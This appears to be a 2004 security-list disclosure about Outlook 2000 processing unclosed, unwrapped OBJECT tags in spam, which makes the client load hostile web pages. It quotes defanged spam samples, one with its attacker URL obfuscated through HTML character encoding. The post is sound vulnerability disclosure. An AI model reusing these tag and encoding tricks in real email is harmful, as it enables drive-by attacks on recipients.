OBJECT Bugs or Features

["James C Slora Jr" <Jim.Slora () phra com>]

Two questions about the recent OBJECT tag assault in spam messages:

1. Should an email client process an OBJECT tag that has no corresponding
/OBJECT?
2. Should an email client process an OBJECT tag that is not even embedded
within HTML tags? 

Apparently the current answer in Outlook is Yes. Two examples below leap to
the Web to download very hostile pages from fully patched fully updated
Outlook 2000. I have not tested in other versions, but the volume of the
incoming spam with these tags suggests other versions are vulnerable too.

I don't think this is new ground, but it is very much wild now.

~ inserted in key places to reduce "you sent me spam" notices.

 
From: "Yesenia Edwards" <YMNUDEWDQHFZWU () yahoo com>
To: <blah () blah blah>
Subject: the email from 2 days ago.. here is my replay..
Date: Mon, 07 Jun 2004 13:29:40 +0600
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="--6941203962437317574"

----6941203962437317574
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

~object
data=3D"http://www.seductiveones.~biz/easy/orrorr/sock/page.~php"~=20

----6941203962437317574--



Many other messages have Object tags that look like this:

~object =
data=3D"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#1=
19;&#105;&#108;&#100;&#119;&#105;&#110;&#99;&#97;&#115;&#105;&#110;&#111;=
&#46;&#110;&#101;&#116;&#47;&#112;&#97;&#103;&#101;&#46;&#112;&#104;&#112=
;"~

Note they mix "=" and "=3D" in addition to not closing the OBJECT tag. The
hostile site URL is often obfuscated through ASCII HTML encoding.